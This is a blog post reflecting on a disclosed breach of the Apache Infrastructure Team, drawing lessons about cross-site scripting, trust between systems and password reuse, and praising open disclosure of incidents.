Last week the folks on the Apache Infrastructure Team were hit with a direct targeted attack. The bad news is that the attackers likely got the access they were looking for, the good news is that the Apache team was able to move from incident to detection to remediation in near record time, and they’ve provided an excellent write up that gives a glimpse into the process that both they and the attackers used during the incident.
This provides a very good real world example of the problems that can come about due to a cross site scripting attack, a vulnerability type that many people scoff at as being little more than a “toy”. We also see how peripheral services, such as a ticketing or issue tracking system can be leveraged to gain access to core systems.
And of course we see that old standby of using the same password to access multiple systems. I know its tough to remember all those different passwords, and its difficult to enforce a policy like this between systems that might otherwise have no communication, but it is possible. I’d recommend an approach similar to the one |)ruids Mnemonic Password Formulas.
All in all this is an excellent illustration of how single vulnerabilities can quickly be escalated into significant system compromises. The first cross site scripting vulnerability or buffer overflow allows an attacker a foothold, but after that its leveraging trust relationships between systems. And its up to administrators to understand those relationships and connections between systems, especially between ICS and external networks, better than an attacker could and take the time to mitigate potential problems before they’re exploited.
For me, what was more important than the vulnerabilities themselves was how this breach disclosure highlighted how transparent disclosure provides useful and actionable threat data to the community.
Contrast this disclosure with the vague off the record leaks about “CyberSpies” infiltrating the power grid that generate headlines but are ultimately provide no actionable information apart from a headline you can add to your scary slideware.
It should come as no surprise that Open Source projects set a high bar that commercial entities can only aspire to. Whether vulnerabilities or incidents, those reported by Open Source projects are less likely to be the marketing and PR activities we expect from their commercial counterparts. The ASF should be commended for their transparency.